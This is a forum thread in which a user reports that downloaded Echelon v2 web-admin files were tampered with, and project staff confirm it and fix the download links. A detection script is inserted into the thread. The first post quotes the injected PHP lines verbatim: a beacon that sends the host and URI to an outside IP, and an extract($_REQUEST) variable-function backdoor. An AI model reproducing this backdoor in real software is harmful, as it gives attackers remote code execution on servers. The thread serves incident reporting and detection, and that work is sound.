Echelon v2 is not yet officially released! If you cannot get this dev-version installed, revert to version 1 as available in our download section.

Author Topic: Echelon Files Infected?  (Read 1567 times)

Offline oldboss

  • Newbie
  • *
  • Posts: 6
Echelon Files Infected?
« on: April 23, 2015, 07:23:26 AM »
So I was suffering from a DoS attack on our server - and found that it all linked back to Echelon, specifically the last lines of index.php and login.php - can someone please confirm this for me? Just downloaded a fresh set of files from official links and it's still there.

EDIT: Files on SourceForge are not affected - the link to the echelon v2 download from here: http://forum.bigbrotherbot.net/downloads/?cat=7 is where it gets the file from an external website: http://www.itdc.ge/other_inc/WickedShell-echelon-v2-unfinished-64-g8434f07.zip


Index.php:
Code:
<?php require 'inc/footer.php'; @file_get_contents("http://95.215.44.219/api.php?x=".$_SERVER['HTTP_HOST'].$_SERVER["REQUEST_URI"]); @extract ($_REQUEST); @die ($ctime($atime)); ?>


Login.php:
Code:
<?php


 @file_get_contents("http://95.215.44.219/api.php?x=".$_SERVER['HTTP_HOST'].$_SERVER["REQUEST_URI"]); @extract ($_REQUEST); @die ($ctime($atime));


 require 'inc/footer.php';


} // end if/else of what kind of page this is.


?>


It creates a b3.php file in root of echelon which is then used to launch DoS attacks against informnapalm.org.
« Last Edit: April 23, 2015, 07:46:17 AM by oldboss »
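
A detection sketch for the injected lines quoted in the post above, added here as an example (not code from the thread or from the Echelon project). It flags extract() over request data combined with a call through a variable function name, and an outbound file_get_contents to a literal IP address; the rule names, the sample strings and the 192.0.2.10 documentation address are constructed for illustration.

```python
import re
import sys
from pathlib import Path

# Heuristic rules modelled on the injected lines quoted in the post.
RULES = {
    # extract() over request data lets a request define local variables
    "extract-request": re.compile(r"extract\s*\(\s*\$_(REQUEST|GET|POST|COOKIE)\b", re.I),
    # $name(...) calls whichever function the variable names
    "variable-call": re.compile(r"\$[A-Za-z_]\w*\s*\("),
    # outbound fetch to a literal IPv4 address instead of a hostname
    "ip-beacon": re.compile(
        r"file_get_contents\s*\(\s*[\"']https?://\d{1,3}(?:\.\d{1,3}){3}[/:\"']", re.I),
}

# Constructed samples; 192.0.2.10 is a documentation address, not an indicator.
INFECTED = r"""<?php
 @file_get_contents("http://192.0.2.10/api.php?x=".$_SERVER['HTTP_HOST']); @extract ($_REQUEST); @die ($ctime($atime));
 require 'inc/footer.php';
?>"""
CLEAN = r"""<?php
$handler = 'strtoupper';
echo $handler($name);
require 'inc/footer.php';
?>"""

def scan_source(text):
    """Return (line_number, rule) pairs for every rule that matches a line."""
    return [(n, rule)
            for n, line in enumerate(text.splitlines(), 1)
            for rule, rx in RULES.items() if rx.search(line)]

def is_suspect(hits):
    """A variable call alone is common in clean PHP; require the combination."""
    rules = {rule for _, rule in hits}
    return {"extract-request", "variable-call"} <= rules or "ip-beacon" in rules

def scan_tree(root):
    """Map each suspect .php file under root to its rule hits."""
    found = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_source(path.read_text(errors="replace"))
        if is_suspect(hits):
            found[str(path)] = hits
    return found

if __name__ == "__main__":
    for path, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(path, hits)
```

A hit is a prompt to diff the file against a copy from a source you trust, not proof by itself.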

Offline WickedShell

  • Moderator
  • Sr. Member
  • *
  • Posts: 201
    • GitHub - WickedShell
Re: Echelon Files Infected?
« Reply #1 on: April 23, 2015, 09:00:35 AM »
Those lines should not be there, if you look at the latest commit to echelon v2 in index.php https://github.com/WickedShell/echelon/blob/version2/echelon/index.php#L80 there should be no references to that server. The same applies to login.php. Neither of these should be there, and it appears that your files have been compromised. I don't know if your source was intending to modify them or not, but they are definitely not from any release history off of my github. If you want the last "clean" version that I worked you can download the files for the version 2 branch directly from github. https://github.com/WickedShell/echelon/archive/version2.zip

That said, I have not been working on Echelon 2 since Nov, 2013 so if there are outstanding security flaws, or if others have been maintaining their own patched versions I would not be too surprised.

Offline Courgette

  • Senior Dev.
  • Hero Member
  • *
  • Posts: 4883
    • Github repository
Re: Echelon Files Infected?
« Reply #2 on: April 23, 2015, 09:16:15 AM »
Thank you for raising this alert. The download links on the download section of our website were tampered with. I fixed those links and they now point to the github repositories.
We are sorry for any inconvenience this may have caused.
« Last Edit: April 23, 2015, 09:38:07 AM by Courgette »

Offline xlr8or

  • [ www.xlrstats.com ]
  • Project Lead
  • Hero Member
  • *
  • Posts: 2057
    • The Art of Tactical Gaming
Re: Echelon Files Infected?
« Reply #3 on: April 23, 2015, 10:15:43 AM »
@Oldboss: How long did you have the compromised files installed? Or, how long ago did you download the first set of compromised files?
« Last Edit: April 23, 2015, 10:20:48 AM by xlr8or »

Offline oldboss

  • Newbie
  • *
  • Posts: 6
Re: Echelon Files Infected?
« Reply #4 on: April 23, 2015, 10:39:17 AM »
Quote from: Courgette
> Thank you for raising this alert. The download links on the download section of our website were tampered with. I fixed those links and they now point to the github repositories.
> We are sorry for any inconvenience this may have caused.

No worries, just glad I could get it sorted for my own sake :)

Quote from: xlr8or
> @Oldboss: How long did you have the compromised files installed? Or, how long ago did you download the first set of compromised files?

That file was last edited April 2nd - so at the latest that date - let me know if you would like any more info.

Offline xlr8or

  • [ www.xlrstats.com ]
  • Project Lead
  • Hero Member
  • *
  • Posts: 2057
    • The Art of Tactical Gaming
Re: Echelon Files Infected?
« Reply #5 on: April 23, 2015, 11:26:44 AM »
Do you also remember when the infected package was first downloaded and installed on your server?

Offline oldboss

  • Newbie
  • *
  • Posts: 6
Re: Echelon Files Infected?
« Reply #6 on: April 23, 2015, 01:12:26 PM »
They were a fresh set of files downloaded and installed at some point between 30/3/2015 and 2/4/2015, sorry that's about as accurate as I can find out.
« Last Edit: April 23, 2015, 02:14:42 PM by oldboss »

 

